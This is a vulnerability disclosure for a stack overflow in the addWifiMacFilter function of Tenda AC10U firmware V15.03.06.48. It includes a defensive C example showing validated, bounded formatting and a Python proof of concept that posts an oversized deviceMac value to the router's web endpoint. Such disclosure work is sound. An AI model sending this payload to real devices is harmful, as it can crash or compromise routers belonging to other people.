addWifiMacFilter_deviceMac.md

Overview

Affected version

AC10U v1.0 Firmware V15.03.06.48

Vulnerability details

The Tenda AC10U v1.0 V15.03.06.48 firmware has a stack overflow vulnerability in the addWifiMacFilter function. The device_mac variable receives the deviceMac parameter from a POST request. The value is passed directly to a sprintf call that writes it into a local variable on the stack, so it can overwrite the return address of the function. A user-provided deviceMac can therefore trigger this vulnerability.
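
A bounded version of the pattern described above, as an added example that is not the firmware's code. The function names, the 32-byte buffer and the "mac=%s" format string are assumptions, since the page does not show the original sprintf call.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAC_STR_LEN 17  /* length of "aa:bb:cc:dd:ee:ff" */

/* Returns 1 only for exactly six hex pairs separated by ':'. */
int is_valid_mac(const char *s)
{
    if (s == NULL || strlen(s) != MAC_STR_LEN)
        return 0;
    for (size_t i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return 1;
}

/*
 * Hypothetical stand-in for the formatting step: the request value is
 * validated first, then written with an explicit size limit.
 * Returns 0 on success, -1 if the value is rejected.
 */
int build_filter_entry(char *out, size_t out_len, const char *device_mac)
{
    if (!is_valid_mac(device_mac))
        return -1;                      /* reject before any copy */
    int n = snprintf(out, out_len, "mac=%s", device_mac);
    if (n < 0 || (size_t)n >= out_len)
        return -1;                      /* output would not fit: error */
    return 0;
}

int main(void)
{
    char entry[32];
    char long_value[1001];              /* constructed oversized input */
    memset(long_value, 'a', 1000);
    long_value[1000] = '\0';

    printf("valid:    %d\n", build_filter_entry(entry, sizeof entry, "00:11:22:aa:bb:cc"));
    printf("too long: %d\n", build_filter_entry(entry, sizeof entry, long_value));
    return 0;
}
```

Checking the snprintf return value matters as much as the size argument: a truncated entry is treated as an error instead of being stored.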


POC

import requests
from pwn import *

# Device address used in the original test
ip = "192.168.84.101"
url = "http://" + ip + "/goform/addWifiMacFilter"
# Oversized deviceMac value (1000 bytes)
payload = b"a" * 1000

data = {"deviceMac": payload, "deviceId": 1}
response = requests.post(url, data=data)
print(response.text)
